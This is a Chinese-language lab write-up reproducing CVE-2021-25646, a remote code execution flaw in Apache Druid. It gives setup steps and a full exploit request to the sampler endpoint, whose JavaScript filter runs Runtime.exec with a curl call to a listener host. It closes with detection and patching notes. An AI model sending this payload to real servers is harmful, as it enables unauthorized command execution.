Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 漏洞复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-02-01 18:31

环境搭建:Docker

https://github.com/apache/druid/tree/master/distribution/docker

Build

From the root of the repo, run docker build -t apache/druid:tag -f distribution/docker/Dockerfile .

Run

Edit `environment` to suit. Run `docker-compose -f distribution/docker/docker-compose.yml up`

Docker 方式报错……

于是改为直接下载 Druid 安装包进行安装:

https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/

https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz

安装教程

https://druid.apache.org/docs/latest/tutorials/index.html

启动

访问IP:8888

导入文件

这里填写目录

quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

抓包,得到控制台发出的 sampler 请求:

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.1.72:8888
Content-Length: 10257
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.72:8888
Referer: http://192.168.1.72:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: (已脱敏:原文此处为浏览器附带的会话 Cookie,含 SESSIONID、request_token 等敏感值,公开抓包内容前应删除)
Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"time\":\"2015-09-12T00:46:58.771Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"added project\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Oswald Tilghman\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"GELongstreet\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:00.496Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"Robot inserta {{Commonscat}} que enllaça amb [[commons:category:Rallicula]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Rallicula\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"PereBot\",\"delta\":17,\"added\":17,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:05.474Z\",\"channel\":\"#en.wikipedia\",\"cityName\":\"Auburn\",\"comment\":\"/* Status of peremptory norms under international law */ fixed spelling of 'Wimbledon'\",\"countryIsoCode\":\"AU\",\"countryName\":\"Australia\",\"isAnonymous\":true,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Peremptory norm\",\"regionIsoCode\":\"NSW\",\"regionName\":\"New South Wales\",\"user\":\"60.225.66.142\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:08.770Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea 
abruzzorum\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:11.862Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus flammigerus\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:13.987Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama mossambica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:17.009Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"/* Imperi Austrohongarès */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Campanya dels Balcans (1914-1918)\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Jaumellecha\",\"delta\":-20,\"added\":0,\"deleted\":20}\n{\"time\":\"2015-09-12T00:47:19.591Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"adding comment on notability and possible COI\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":true,\"isRobot\":false,\"isUnpatrolled\":true,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Dani Ploeger\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"New Media 
Theorist\",\"delta\":345,\"added\":345,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:21.578Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Copying assessment table to wiki\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:WP 1.0 bot/Tables/Project/Pubs\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"WP 1.0 bot\",\"delta\":121,\"added\":121,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:25.821Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama persimilis\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:29.913Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Blank stale warning(s) and replace with {{[[template:OW|OW]]}} using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User talk\",\"page\":\"User talk:161.184.95.17\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"DavidLeighEllis\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:33.004Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus 
edioi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:35.776Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agave gentryi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"TuHan-Bot\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:37.881Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama sankaranica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:42.090Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea albertae\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:44.963Z\",\"channel\":\"#ru.wikipedia\",\"cityName\":null,\"comment\":\"/* Донецкая Народная Республика */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Караман, Александр Акимович\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Камарад 
Че\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:47.870Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus duboisi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:50.819Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"/* Films */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Keiynan Lonsdale\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Lg16spears\",\"delta\":-11,\"added\":0,\"deleted\":11}\n{\"time\":\"2015-09-12T00:47:53.259Z\",\"channel\":\"#ja.wikipedia\",\"cityName\":null,\"comment\":\"/* 対戦通算成績と得失点 */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"アルビレックス新潟の年度別成績一覧\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"BlueMoon2662\",\"delta\":14,\"added\":14,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:56.126Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Bot updating unblock request table ([[en:WP:PEACHY|Peachy 2.0 (alpha 8)]])\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:Cyberbot I/Requests for unblock report\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cyberbot 
I\",\"delta\":-74,\"added\":0,\"deleted\":74}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
					"function": "function(value){return java.lang.Runtime.getRuntime().exec('curl 192.168.1.72:8181')}",
					"dimension": "added",
					"": {
						"enabled": "true"
					}
				}
			}
		},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

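如果报错,把 filter 改成下面的形式。其中键名为空字符串("")的对象是关键:Druid 默认关闭 JavaScript 功能(druid.javascript.enabled=false),而这个空键会在反序列化时覆盖该配置,使 function 字段中的脚本被执行。排查日志或编写检测规则时,可重点关注发往 /druid/indexer/v1/sampler、且请求体同时含有 "type":"javascript" 和空键名的请求;修复方式是升级到官方已修补该漏洞的版本,并限制对控制台端口的网络访问。

{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('curl 192.168.1.72:8181')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
}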
